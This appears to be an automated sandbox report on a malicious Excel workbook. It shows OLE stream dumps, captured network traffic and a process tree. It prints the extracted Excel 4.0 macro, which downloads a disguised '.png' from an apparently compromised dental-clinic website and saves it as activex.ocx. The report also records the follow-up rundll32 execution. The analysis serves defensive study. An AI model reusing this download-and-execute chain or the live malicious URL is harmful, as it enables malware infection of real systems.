              Entropy:3.27412475502
              Base64 Encoded:False
              Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . . . . . . . . . . . . . @ . . . . . . . H . . . . . . . T . . . . . . . ` . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . . | . # . . . @ . . . . . y w . . . . . . . . . . . .
              Data Raw:fe ff 00 00 0a 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 98 00 00 00 07 00 00 00 01 00 00 00 40 00 00 00 04 00 00 00 48 00 00 00 08 00 00 00 54 00 00 00 12 00 00 00 60 00 00 00 0c 00 00 00 78 00 00 00 0d 00 00 00 84 00 00 00 13 00 00 00 90 00 00 00 02 00 00 00 e3 04 00 00 1e 00 00 00 04 00 00 00
              Stream Path: Ctls, File Type: data, Stream Size: 68
              General
              Stream Path:Ctls
              File Type:data
              Stream Size:68
              Entropy:3.77907363839
              Base64 Encoded:False
              Data ASCII: . . . B . . . . . . . . ` . . . . . . ` . . . . . . . . . . . ( . . . . . . . . . . . 5 . . . . . . . . . . . . . . . C a l i b r i .
              Data Raw:20 1d d2 8b 42 ec ce 11 9e 0d 00 aa 00 60 02 f3 00 02 14 00 60 01 01 80 00 00 00 00 03 02 00 00 28 01 00 00 d4 00 00 00 00 02 18 00 35 00 00 00 07 00 00 80 d8 00 00 00 00 02 00 00 43 61 6c 69 62 72 69 1c
              Stream Path: Workbook, File Type: Applesoft BASIC program data, first line number 16, Stream Size: 154550
              General
              Stream Path:Workbook
              File Type:Applesoft BASIC program data, first line number 16
              Stream Size:154550
              Entropy:7.98610242414
              Base64 Encoded:True
              Data ASCII:. . . . . . . . T 8 . . . . . . . . . . / . 6 . . . . . . . . . 6 > c d } . @ { . . . < 9 . ` - . . . . " . < . * . . 6 2 \\ . . . . . [ . . . . P . ( . . . . . . . . . . . . . t . . . . . \\ . p . . . ! . . . . . . . . . . { . $ 8 . . . . . . . . . ) . . 4 . | v U . [ < . t . . m . . 8 . . 4 . . . . ) 8 . o . P . . . . . N > . . . . . f . . . . . . . . . . . > . . / . . . ( / . . _ . $ F o . . l . . . . . . j h . . B . . . . . a . . . . . . . . . = . . . . . . . S . . . . . . . . . . . . . W . . . . . . t
              Data Raw:09 08 10 00 00 06 05 00 54 38 cd 07 c9 00 02 00 06 07 00 00 2f 00 36 00 01 00 01 00 01 00 92 95 36 3e 63 64 7d ad 40 7b f5 0a f4 3c 39 e8 60 2d b6 bc c7 d7 22 ab 3c c4 2a 9a 0f 36 32 5c 19 f5 e4 05 cb 5b bc 99 cb 9a 50 d8 28 8c eb 19 e1 00 02 00 b0 04 c1 00 02 00 74 f3 e2 00 00 00 5c 00 70 00 df 94 21 f2 c1 f7 f6 ae 8e e7 8c 02 fd 7b db 24 38 d5 a3 8a b0 a5 02 f8 06 ce 29 af e8 34
              Stream Path: _VBA_PROJECT_CUR/PROJECT, File Type: ISO-8859 text, with CRLF line terminators, Stream Size: 387
              General
              Stream Path:_VBA_PROJECT_CUR/PROJECT
              File Type:ISO-8859 text, with CRLF line terminators
              Stream Size:387
              Entropy:5.00967281416
              Base64 Encoded:True
              Data ASCII:I D = " { C 4 7 7 9 5 8 8 - 7 8 B C - 4 0 2 C - 9 C 2 8 - 3 4 8 E A A E D 9 5 6 B } " . . D o c u m e n t = . . . . 1 / & H 0 0 0 0 0 0 0 0 . . N a m e = " V B A P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " A 1 A 3 5 6 9 E 5 A 9 E 5 A 9 E 5 A 9 E 5 A " . . D P B = " 5 3 5 1 A 4 F A 5 7 F B 5 7 F B 5 7 " . . G C = " 0 5 0 7 F 2 4 C 1 6 F F 1 7 F F 1 7 0 0 " . . . . [ H o s t E x t e n d e r I n f o ] . . & H 0 0 0 0
              Data Raw:49 44 3d 22 7b 43 34 37 37 39 35 38 38 2d 37 38 42 43 2d 34 30 32 43 2d 39 43 32 38 2d 33 34 38 45 41 41 45 44 39 35 36 42 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d cb e8 f1 f2 31 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 4e 61 6d 65 3d 22 56 42 41 50 72 6f 6a 65 63 74 22 0d 0a 48 65 6c 70 43 6f 6e 74 65 78 74 49 44 3d 22 30 22 0d 0a 56 65 72 73 69 6f 6e 43 6f 6d 70 61 74 69 62 6c 65 33
              Stream Path: _VBA_PROJECT_CUR/PROJECTwm, File Type: data, Stream Size: 20
              General
              Stream Path:_VBA_PROJECT_CUR/PROJECTwm
              File Type:data
              Stream Size:20
              Entropy:3.04643934467
              Base64 Encoded:False
              Data ASCII:. . . . 1 . . . 8 . A . B . 1 . . . . .
              Data Raw:cb e8 f1 f2 31 00 1b 04 38 04 41 04 42 04 31 00 00 00 00 00
              Stream Path: _VBA_PROJECT_CUR/VBA/_VBA_PROJECT, File Type: data, Stream Size: 2767
              General
              Stream Path:_VBA_PROJECT_CUR/VBA/_VBA_PROJECT
              File Type:data
              Stream Size:2767
              Entropy:3.97981669814
              Base64 Encoded:False
              Data ASCII:. a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 2 . # . 9 . # . C . : . \\ . P . R . O . G . R . A . ~ . 2 . \\ . C . O . M . M . O . N . ~ . 1 . \\ . M . I . C . R . O . S . ~ . 1 . \\ . V . B . A . \\ . V . B . A . 7 . . . 1 . \\ . V . B . E . 7 . . . D . L . L . # . V . i . s . u . a . l . . B . a . s . i . c .
              Data Raw:cc 61 a3 00 00 01 00 ff 19 04 00 00 09 04 00 00 e3 04 01 00 00 00 00 00 00 00 00 00 01 00 05 00 02 00 fe 00 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 32 00 23 00
              Stream Path: _VBA_PROJECT_CUR/VBA/dir, File Type: data, Stream Size: 728
              General
              Stream Path:_VBA_PROJECT_CUR/VBA/dir
              File Type:data
              Stream Size:728
              Entropy:6.37265666305
              Base64 Encoded:True
              Data ASCII:. . . . . . . . . . . . 0 * . . . . . p . . H . . . . . d . . . . . . . . V B A P r o j e . c t . . 4 . . @ . . j . . . = . . . . r . . . . . . . . . ) 3 . a . . . . . J < . . . . . r . s t d o l e > . . . s . t . d . o . . l . e . . . h . % . ^ . . * \\ G { 0 0 . 0 2 0 4 3 0 - . . . . . C . . . . . . 0 0 4 . 6 } # 2 . 0 # 0 . # C : \\ W i n d . o w s \\ S y s W O W 6 4 \\ . e 2 . . t l b # O L E . A u t o m a t i . o n . ` . . . E O f f D i c . E O . f . . i . . c . E . . . . . . . E . 2 D F 8 D 0 4 C . -
              Data Raw:01 d4 b2 80 01 00 04 00 00 00 01 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 82 02 00 64 e3 04 04 00 0a 00 1c 00 56 42 41 50 72 6f 6a 65 88 63 74 05 00 34 00 00 40 02 14 6a 06 02 0a 3d 02 0a 07 02 72 01 14 08 05 06 12 09 02 12 29 33 e3 61 05 94 00 0c 02 4a 3c 02 0a 16 00 01 72 80 73 74 64 6f 6c 65 3e 02 19 00 73 00 74 00 64 00 6f 00 80 6c 00 65 00 0d 00 68 00 25 02 5e 00 03 2a 5c 47
              Stream Path: _VBA_PROJECT_CUR/VBA/\x1051\x1080\x1089\x10901, File Type: data, Stream Size: 1127
              General
              Stream Path:_VBA_PROJECT_CUR/VBA/\x1051\x1080\x1089\x10901
              File Type:data
              Stream Size:1127
              Entropy:3.56364076858
              Base64 Encoded:True
              Data ASCII:. . . . . . . . . . . . . . . . . $ . . . . . . . 8 . . . . . . . . . . . . . . . H . . . . . . . c . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . L i s t B o x 1 , 2 , 0 , M S F o r m s , L i s t B o x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . .
              Data Raw:01 16 01 00 00 14 01 00 00 18 03 00 00 f8 00 00 00 24 02 00 00 ff ff ff ff 38 03 00 00 8c 03 00 00 00 00 00 00 01 00 00 00 48 1c e9 9f 00 00 ff ff 63 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

              Macro 4.0 Code

              CALL("URLMon", "URLDownloadToFileA", "JJCCJJ", 0, ="https://www.penrithdentalimplants.com.au/ls/apperolew.png", C:\ProgramData\activex.ocx, 0, 0)
              
              "=""https://www.penrithdentalimplants.com.au/ls/apperolew.png""",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,

              Network Behavior

              Network Port Distribution

              TCP Packets

              TimestampSource PortDest PortSource IPDest IP
              Jan 5, 2021 13:01:07.085342884 CET49167443192.168.2.22160.153.76.195
              Jan 5, 2021 13:01:07.273987055 CET44349167160.153.76.195192.168.2.22
              Jan 5, 2021 13:01:07.274081945 CET49167443192.168.2.22160.153.76.195
              Jan 5, 2021 13:01:07.283557892 CET49167443192.168.2.22160.153.76.195
              Jan 5, 2021 13:01:07.471865892 CET44349167160.153.76.195192.168.2.22
              Jan 5, 2021 13:01:07.479675055 CET44349167160.153.76.195192.168.2.22
              Jan 5, 2021 13:01:07.479729891 CET44349167160.153.76.195192.168.2.22
              Jan 5, 2021 13:01:07.479768038 CET44349167160.153.76.195192.168.2.22
              Jan 5, 2021 13:01:07.480004072 CET49167443192.168.2.22160.153.76.195
              Jan 5, 2021 13:01:07.514084101 CET49167443192.168.2.22160.153.76.195
              Jan 5, 2021 13:01:07.707853079 CET44349167160.153.76.195192.168.2.22
              Jan 5, 2021 13:01:07.707982063 CET49167443192.168.2.22160.153.76.195
              Jan 5, 2021 13:01:08.878242970 CET49167443192.168.2.22160.153.76.195
              Jan 5, 2021 13:01:09.106628895 CET44349167160.153.76.195192.168.2.22
              Jan 5, 2021 13:01:09.276684999 CET44349167160.153.76.195192.168.2.22
              Jan 5, 2021 13:01:09.276724100 CET44349167160.153.76.195192.168.2.22
              Jan 5, 2021 13:01:09.276753902 CET44349167160.153.76.195192.168.2.22
              Jan 5, 2021 13:01:09.276793003 CET44349167160.153.76.195192.168.2.22
              Jan 5, 2021 13:01:09.276828051 CET44349167160.153.76.195192.168.2.22
              Jan 5, 2021 13:01:09.276865005 CET44349167160.153.76.195192.168.2.22
              Jan 5, 2021 13:01:09.276901007 CET44349167160.153.76.195192.168.2.22
              Jan 5, 2021 13:01:09.276920080 CET49167443192.168.2.22160.153.76.195
              Jan 5, 2021 13:01:09.276947975 CET44349167160.153.76.195192.168.2.22
              Jan 5, 2021 13:01:09.276989937 CET49167443192.168.2.22160.153.76.195
              Jan 5, 2021 13:01:09.276989937 CET44349167160.153.76.195192.168.2.22
              Jan 5, 2021 13:01:09.277025938 CET49167443192.168.2.22160.153.76.195
              Jan 5, 2021 13:01:09.277029037 CET44349167160.153.76.195192.168.2.22
              Jan 5, 2021 13:01:09.277034998 CET49167443192.168.2.22160.153.76.195
              Jan 5, 2021 13:01:09.277065992 CET44349167160.153.76.195192.168.2.22
              Jan 5, 2021 13:01:09.277079105 CET49167443192.168.2.22160.153.76.195
              Jan 5, 2021 13:01:09.277086020 CET49167443192.168.2.22160.153.76.195
              Jan 5, 2021 13:01:09.277105093 CET44349167160.153.76.195192.168.2.22
              Jan 5, 2021 13:01:09.277134895 CET44349167160.153.76.195192.168.2.22
              Jan 5, 2021 13:01:09.277139902 CET49167443192.168.2.22160.153.76.195
              Jan 5, 2021 13:01:09.277168989 CET49167443192.168.2.22160.153.76.195
              Jan 5, 2021 13:01:09.277173042 CET44349167160.153.76.195192.168.2.22
              Jan 5, 2021 13:01:09.277200937 CET49167443192.168.2.22160.153.76.195
              Jan 5, 2021 13:01:09.277214050 CET44349167160.153.76.195192.168.2.22
              Jan 5, 2021 13:01:09.277235031 CET49167443192.168.2.22160.153.76.195
              Jan 5, 2021 13:01:09.277260065 CET44349167160.153.76.195192.168.2.22
              Jan 5, 2021 13:01:09.277267933 CET49167443192.168.2.22160.153.76.195
              Jan 5, 2021 13:01:09.277301073 CET44349167160.153.76.195192.168.2.22
              Jan 5, 2021 13:01:09.277314901 CET49167443192.168.2.22160.153.76.195
              Jan 5, 2021 13:01:09.277337074 CET44349167160.153.76.195192.168.2.22
              Jan 5, 2021 13:01:09.277348042 CET49167443192.168.2.22160.153.76.195
              Jan 5, 2021 13:01:09.277374029 CET44349167160.153.76.195192.168.2.22
              Jan 5, 2021 13:01:09.277399063 CET49167443192.168.2.22160.153.76.195
              Jan 5, 2021 13:01:09.277420998 CET49167443192.168.2.22160.153.76.195
              Jan 5, 2021 13:01:09.277442932 CET44349167160.153.76.195192.168.2.22
              Jan 5, 2021 13:01:09.277478933 CET44349167160.153.76.195192.168.2.22
              Jan 5, 2021 13:01:09.277504921 CET49167443192.168.2.22160.153.76.195
              Jan 5, 2021 13:01:09.277524948 CET44349167160.153.76.195192.168.2.22
              Jan 5, 2021 13:01:09.277530909 CET49167443192.168.2.22160.153.76.195
              Jan 5, 2021 13:01:09.277565002 CET44349167160.153.76.195192.168.2.22
              Jan 5, 2021 13:01:09.277575970 CET49167443192.168.2.22160.153.76.195
              Jan 5, 2021 13:01:09.277601004 CET44349167160.153.76.195192.168.2.22
              Jan 5, 2021 13:01:09.277602911 CET49167443192.168.2.22160.153.76.195
              Jan 5, 2021 13:01:09.277638912 CET44349167160.153.76.195192.168.2.22
              Jan 5, 2021 13:01:09.277654886 CET49167443192.168.2.22160.153.76.195
              Jan 5, 2021 13:01:09.277667046 CET44349167160.153.76.195192.168.2.22
              Jan 5, 2021 13:01:09.277686119 CET49167443192.168.2.22160.153.76.195
              Jan 5, 2021 13:01:09.277703047 CET44349167160.153.76.195192.168.2.22
              Jan 5, 2021 13:01:09.277714014 CET49167443192.168.2.22160.153.76.195
              Jan 5, 2021 13:01:09.277740002 CET44349167160.153.76.195192.168.2.22
              Jan 5, 2021 13:01:09.277741909 CET49167443192.168.2.22160.153.76.195
              Jan 5, 2021 13:01:09.277776957 CET44349167160.153.76.195192.168.2.22
              Jan 5, 2021 13:01:09.277795076 CET49167443192.168.2.22160.153.76.195
              Jan 5, 2021 13:01:09.277823925 CET49167443192.168.2.22160.153.76.195
              Jan 5, 2021 13:01:09.277822971 CET44349167160.153.76.195192.168.2.22
              Jan 5, 2021 13:01:09.277863979 CET44349167160.153.76.195192.168.2.22
              Jan 5, 2021 13:01:09.277899981 CET44349167160.153.76.195192.168.2.22
              Jan 5, 2021 13:01:09.277915001 CET49167443192.168.2.22160.153.76.195
              Jan 5, 2021 13:01:09.277936935 CET44349167160.153.76.195192.168.2.22
              Jan 5, 2021 13:01:09.277947903 CET49167443192.168.2.22160.153.76.195
              Jan 5, 2021 13:01:09.277973890 CET49167443192.168.2.22160.153.76.195
              Jan 5, 2021 13:01:09.277973890 CET44349167160.153.76.195192.168.2.22
              Jan 5, 2021 13:01:09.278009892 CET44349167160.153.76.195192.168.2.22
              Jan 5, 2021 13:01:09.278026104 CET49167443192.168.2.22160.153.76.195
              Jan 5, 2021 13:01:09.278047085 CET44349167160.153.76.195192.168.2.22
              Jan 5, 2021 13:01:09.278078079 CET49167443192.168.2.22160.153.76.195
              Jan 5, 2021 13:01:09.278084040 CET44349167160.153.76.195192.168.2.22
              Jan 5, 2021 13:01:09.278110027 CET49167443192.168.2.22160.153.76.195
              Jan 5, 2021 13:01:09.278131008 CET44349167160.153.76.195192.168.2.22
              Jan 5, 2021 13:01:09.278137922 CET49167443192.168.2.22160.153.76.195
              Jan 5, 2021 13:01:09.278162956 CET44349167160.153.76.195192.168.2.22
              Jan 5, 2021 13:01:09.278196096 CET49167443192.168.2.22160.153.76.195
              Jan 5, 2021 13:01:09.278198957 CET44349167160.153.76.195192.168.2.22
              Jan 5, 2021 13:01:09.278227091 CET49167443192.168.2.22160.153.76.195
              Jan 5, 2021 13:01:09.278235912 CET44349167160.153.76.195192.168.2.22
              Jan 5, 2021 13:01:09.278249979 CET49167443192.168.2.22160.153.76.195
              Jan 5, 2021 13:01:09.278273106 CET44349167160.153.76.195192.168.2.22
              Jan 5, 2021 13:01:09.278283119 CET49167443192.168.2.22160.153.76.195
              Jan 5, 2021 13:01:09.278307915 CET44349167160.153.76.195192.168.2.22
              Jan 5, 2021 13:01:09.278326035 CET49167443192.168.2.22160.153.76.195
              Jan 5, 2021 13:01:09.278356075 CET49167443192.168.2.22160.153.76.195
              Jan 5, 2021 13:01:09.283272028 CET49167443192.168.2.22160.153.76.195
              Jan 5, 2021 13:01:09.466720104 CET44349167160.153.76.195192.168.2.22
              Jan 5, 2021 13:01:09.466777086 CET44349167160.153.76.195192.168.2.22
              Jan 5, 2021 13:01:09.466815948 CET44349167160.153.76.195192.168.2.22
              Jan 5, 2021 13:01:09.466854095 CET44349167160.153.76.195192.168.2.22

              UDP Packets

              TimestampSource PortDest PortSource IPDest IP
              Jan 5, 2021 13:01:06.999558926 CET5219753192.168.2.228.8.8.8
              Jan 5, 2021 13:01:07.055907011 CET53521978.8.8.8192.168.2.22
              Jan 5, 2021 13:01:08.122844934 CET5309953192.168.2.228.8.8.8
              Jan 5, 2021 13:01:08.170912027 CET53530998.8.8.8192.168.2.22
              Jan 5, 2021 13:01:08.184622049 CET5283853192.168.2.228.8.8.8
              Jan 5, 2021 13:01:08.232651949 CET53528388.8.8.8192.168.2.22

              DNS Queries

              TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
              Jan 5, 2021 13:01:06.999558926 CET192.168.2.228.8.8.80x1168Standard query (0)www.penrithdentalimplants.com.auA (IP address)IN (0x0001)

              DNS Answers

              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
              Jan 5, 2021 13:01:07.055907011 CET8.8.8.8192.168.2.220x1168No error (0)www.penrithdentalimplants.com.aupenrithdentalimplants.com.auCNAME (Canonical name)IN (0x0001)
              Jan 5, 2021 13:01:07.055907011 CET8.8.8.8192.168.2.220x1168No error (0)penrithdentalimplants.com.au160.153.76.195A (IP address)IN (0x0001)

              HTTPS Packets

              TimestampSource IPSource PortDest IPDest PortSubjectIssuerNot BeforeNot AfterJA3 SSL Client FingerprintJA3 SSL Client Digest
              Jan 5, 2021 13:01:07.479768038 CET160.153.76.195443192.168.2.2249167CN=penrithdentalimplants.com.au, O=Nepean Dental Implants and Cosmetic Dentistry, L=Penrith, ST=New South Wales, C=AU CN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=USCN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=USFri Aug 07 20:52:48 CEST 2020 Tue May 03 09:00:00 CEST 2011Wed Oct 06 15:19:58 CEST 2021 Sat May 03 09:00:00 CEST 2031771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,0-10-11-13-23-65281,23-24,07dcce5b76c8b17472d024758970a406b
              CN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=USCN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=USTue May 03 09:00:00 CEST 2011Sat May 03 09:00:00 CEST 2031

              Code Manipulations

              Statistics

              Behavior

              Click to jump to process

              System Behavior

              General

              Start time:13:00:41
              Start date:05/01/2021
              Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
              Wow64 process (32bit):false
              Commandline:'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
              Imagebase:0x13f220000
              File size:27641504 bytes
              MD5 hash:5FB0A0F93382ECD19F5F499A5CAA59F0
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:high

              General

              Start time:13:00:50
              Start date:05/01/2021
              Path:C:\Windows\System32\rundll32.exe
              Wow64 process (32bit):false
              Commandline:rundll32 C:\ProgramData\activex.ocx, DllRegisterServer
              Imagebase:0xffcd0000
              File size:45568 bytes
              MD5 hash:DD81D91FF3B0763C392422865C9AC12E
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:moderate

              General

              Start time:13:00:51
              Start date:05/01/2021
              Path:C:\Windows\SysWOW64\rundll32.exe
              Wow64 process (32bit):true
